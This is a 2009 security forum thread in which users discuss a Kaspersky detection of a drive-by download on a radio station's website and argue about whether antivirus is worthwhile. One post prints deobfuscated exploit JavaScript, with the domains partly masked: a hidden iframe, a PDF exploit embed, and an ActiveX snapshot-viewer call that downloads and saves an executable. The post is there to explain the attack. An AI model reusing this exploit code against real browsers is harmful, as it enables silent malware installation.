This is the first time I visited an infected website!

Discussion in 'other anti-virus software' started by Football, Apr 27, 2009.

Thread Status:
Not open for further replies.
  1. Football

    Football Registered Member

    Joined:
    Nov 29, 2008
    Posts:
    96
    Location:
    Greece
    Today I visited the website of a radio station. Immediately Kaspersky Internet Security alerted me that "virus HEUR: Trojan.Script.Heuristic" was detected. At first I thought that this was a false positive and I sent a request to Kaspersky Lab. They replied to me in about an hour and they informed me that this was not a false positive and that its detection will be added in the next update. So excellent job for Kaspersky heuristics and Kaspersky Lab for its prompt reaction.
    What is more, I learned something very important.
    I had never visited before an infected website which downloads automatically malware (at least my previous antivirus ESET Smart Security had not detected anything :rolleyes: ) and I thought that somebody will be infected via internet only when they download files from unknown websites. (I had downloaded malware in this way two times in the past). I was wrong!
    I do not know if the radio station infected its website itself or somebody else did it.
    What I know now is only this: A decent antivirus programme is indispensable nowadays.
     
  2. TrojanHunter

    TrojanHunter Registered Member

    Joined:
    Jul 8, 2007
    Posts:
    151
    Location:
    United Kingdom
    Yeah, quite surprising what you can find, even if you think the Website is safe.
    A Few weeks back I was surfing and a Box appeared telling me that I had infections on my PC. I knew it was a rogue, but like an idiot I clicked cancel thinking the Box would disappear (Rogues don't understand cancel:D ). I was redirected to a Rogue Anti-virus website, but I closed up the browser before it could go any further and I was not infected.
     
  3. tipstir

    tipstir Registered Member

    Joined:
    Jun 9, 2008
    Posts:
    830
    Location:
    SFL, USA
    Yes that is common, but in that event best to shutdown the internet connection or simply unplug the LAN cable reboot the PC. Otherwise these prompts on the network are smart to tell if you press yes or cancel since both are set to yes no matter what you do..
     
  4. Zyrtec

    Zyrtec Registered Member

    Joined:
    Mar 4, 2008
    Posts:
    534
    Location:
    USA
    Well, I see how efective is having installed an AntiVirus with HTTP traffic scanning capabilities because they scan for malicious scripts embedded in many Web pages.

    So far, I know that Eset NOD32, Kaspersky, Avira and Avast! have this capability of scanning HTTP traffic before IE (or Firefox?) download the contents of the web site to your PC.

    Although, I don't know how Windows Vista IE “Protected Mode” , could also be helpful regarding these kind of threats.

    Best regards,

    Carlos
     
  5. lodore

    lodore Registered Member

    Joined:
    Jun 22, 2006
    Posts:
    9,006
    that would be the relatively new kjim script heuristics.
    the kaspersky heristics are getting better all the time.
    the heristics detected an email attachment malware awhile back.
    I thought it was malware anyway since it was from an email with attachment from an unknown sourse so was gonna delete email anyway.
     
  6. Baz_kasp

    Baz_kasp Registered Member

    Joined:
    May 1, 2008
    Posts:
    593
    Location:
    London
    Can you give us a hint at the website (just dont make it an active link) I would be interested to see what exactly it was trying to download :)
     
  7. Macstorm

    Macstorm Registered Member

    Joined:
    Mar 7, 2005
    Posts:
    2,531
    Location:
    Sneffels volcano
    and there are still people saying HTTP scanning is useless :rolleyes:
     
  8. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    Solution... Firefox + NoScript add-on.
     
  9. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    It is... it's a marketing scam.

    I can visit every website in the world and not get "infected" with anything.
     
  10. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    This is exactly what Kaspersky was hoping for.. word of mouth advertisement.

    It's all a BIG SCAM.. to hook the ignorant to buy their products and to tell others how "good" their products are that it picked up this and that... blah blah blah.

    Marketing scam, deceptive, and down right ridiculous.

    Only the ignorant fall for it.
     
  11. firzen771

    firzen771 Registered Member

    Joined:
    Oct 29, 2007
    Posts:
    4,815
    Location:
    Canada
    thats a pretty bold statement... :cautious:
     
  12. Macstorm

    Macstorm Registered Member

    Joined:
    Mar 7, 2005
    Posts:
    2,531
    Location:
    Sneffels volcano
    do you? good luck then :-*
     
  13. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    Bold, but true :)

    Come on guys and gals, don't be so gullible. This reminds me of the days when John McAfee was caught writing his own virus' so that people would think McAfee AV was the best one out there, catching the "new virus'" before any other AV :p

    Come on people... grow some brains,,, dont be fools.
     
  14. firzen771

    firzen771 Registered Member

    Joined:
    Oct 29, 2007
    Posts:
    4,815
    Location:
    Canada
    hmm well im glad u think that, good luck :rolleyes:
     
  15. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    I will prove it and put my money where my mouth is... post the "infected" website and I will visit it.
     
  16. firzen771

    firzen771 Registered Member

    Joined:
    Oct 29, 2007
    Posts:
    4,815
    Location:
    Canada
    ye i can throw on sandboxie and know im 99.99% protected (cuz nothing is 100%) but when ur just surfing normally without sandbox and might not be expecting an infected site, then boom, for all u know it could be a site u always go to thats been hijacked and then it hits u...
     
  17. TonyW

    TonyW Registered Member

    Joined:
    Oct 12, 2005
    Posts:
    2,634
    Location:
    UK
    It's good to know KL picked this up, but I would suggest that if the site is still infected, some contact is made with the webmaster of it so it can be removed and cleaned up. It's one thing you being protected from it, but they still need to clean the malware off the site.

    This happened to a legitimate site I know of and the source code revealed javascript that shouldn't have been there. Yes, KL detected it by heuristics and later by signature detection, but contact was made with the site owners to alert them to the problem. In a relatively short while, they removed the malware, and KL no longer detected the threat on that site.
     
  18. DevilFrank

    DevilFrank Registered Member

    Joined:
    Jul 20, 2003
    Posts:
    108
    The protected mode of IE is a very strong solution to avoid this "drive-by downloads" because the needed rights to change the system are not provided. You have to accept any installation from the TIF via UAC.
     
  19. dawgg

    dawgg Registered Member

    Joined:
    Jun 18, 2006
    Posts:
    817
    Yes, one of the best protection methods against these, but usability to the "average user" is a big down-side (layouts of websites etc).

    Mate, we all have our own opinions and I respect that, but calling everyone who thinks something is useful "ignorant" and "fools" just because you do not agree... well, its not exactly a clever thing to say. :thumbd:

    Please respect others and their opinions.
     
  20. Baz_kasp

    Baz_kasp Registered Member

    Joined:
    May 1, 2008
    Posts:
    593
    Location:
    London

    Hmm, yes they are lying to steal your money :cautious:

    Let me give you an example:

    Obfuscated script detected by heuristics.... blocked before it can do any damage.

    Unobfuscated form:

    Code:
    <iframe src="http://jL.-----.pl/rc/” style=“display:none”>
    Mangled the links to prevent infection.

    That leads to another script (also detected by heurisitcs) which you can see here:
    paste2.org/p/193626 (safe link, text dump only)

    After decrypting that one, looks more like this:
    paste2.org/p/193630 (safe link again)


    Most important parts:

    Code:
    .....
    if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}
    if (obj) {document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.----.pl/rc/pdf.php?id=460939' type='application/pdf'></embed>";}
    } catch(e) {
    document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.----.pl/rc/pdf.php?id=460939' type='application/pdf'></embed>";
    
    ......
    function snpac(){
    var buf1 = 'http://jl.-----.pl/rc/load.php?id=460939&spl=4';
    try{
    var obj = document.createElement('object');
    obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
    obj.setAttribute("id", "obj");
    obj.SnapshotPath = buf1;
    obj.CompressedPath = 'C:\NOFCym2lizm5Rw35.exe';
    obj.PrintSnapshot();
    } catch(e) {}
    setTimeout("pdf()", 300);
    }
    
    attack(1);
    0
    Guess what this code does then.....


    2 nice files, 8796.pfd and load.exe


    It's all good walking around with a smug look on your face telling people they are idiots but the fact is would you rather be one of these ignorant people who use antivirus and trust heuristics or put yourself up against a fully fledged pdf exploit (15/40)+virut payload (21/40) that even sandboxie may not be able to save you from? ;)

    And please don't come back with something impractical like "use linux" or "use sandboxie and forget your AV" or "use an imaging program" because it may be good for you, but for most home users it's entirely impractical because they have no idea what a sandbox is, what kind of animal a linux is or what the difference between a disk imager and photoshop is.
     
  21. Football

    Football Registered Member

    Joined:
    Nov 29, 2008
    Posts:
    96
    Location:
    Greece
    You may be an experienced user and maybe you will be able to avoid viruses without the help of an antivirus. But is any single user as experienced as you and know how to prevent viruses alone? I think that the overall percentage of the people than can do this is about 5%. Does everyone know Sandboxie and NoScript? I learned about them only when I started visiting this forum six months ago. And in these six months I enhanced my knowledge of computer security a lot and I can assure you that I am neither "ignorant" nor "fool".But does anyone know the existence of this forum to be informed?

    I am not an employee of Kaspersky and I do not try to make you buy this product by posting positive comments. I wanted simply to tell you that Kaspersky detected "Drive-By-Downloads" malware that maybe would detect and other antiviruses.;)

    I thought that in this forum someone can also express their opinion about antiviruses. However, when I posted positive comments about Kaspersky, I became "ignorant", "fool" and somebody who spreads scams. Right?
     
    Last edited: Apr 28, 2009
  22. Joeythedude

    Joeythedude Registered Member

    Joined:
    Apr 19, 2007
    Posts:
    519
    I'm glad you did , and am always really glad to see posts with experience of a real world malware activity.

    I don't know anything about the usefullness or otherwise of HTTP scanning.

    However I would be highly surprised - to say the least - if a large AV company had a routine policy of lying to customers about the usefulness of a specific aspect of their product , which is the logical conclusion of what the other poster is claiming.
     
    Last edited: Apr 28, 2009
  23. Bob D

    Bob D Registered Member

    Joined:
    Apr 18, 2005
    Posts:
    1,150
    Location:
    Mass., USA
    Pardon my naiveté, but are you saying the download started automatically?
    Versus prompted for a DL, or redirected to a DL site?
    Which browser are you using?

    Cheers
     
  24. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    I can visit any "infected" website just using firefox and Vista, no sandboxie and still nothing will infect my Vista.
     
  25. tonyseeking

    tonyseeking Former Poster

    Joined:
    Nov 12, 2008
    Posts:
    406
    You have raised some intelligent, valid and fair comments. Point taken. :thumb:

    But I still fail to see how a website can automatically begin to download something without user knowledge, and then install itself on their windows without user approval. Can you show me a website that can do that?
     
Loading...
Thread Status:
Not open for further replies.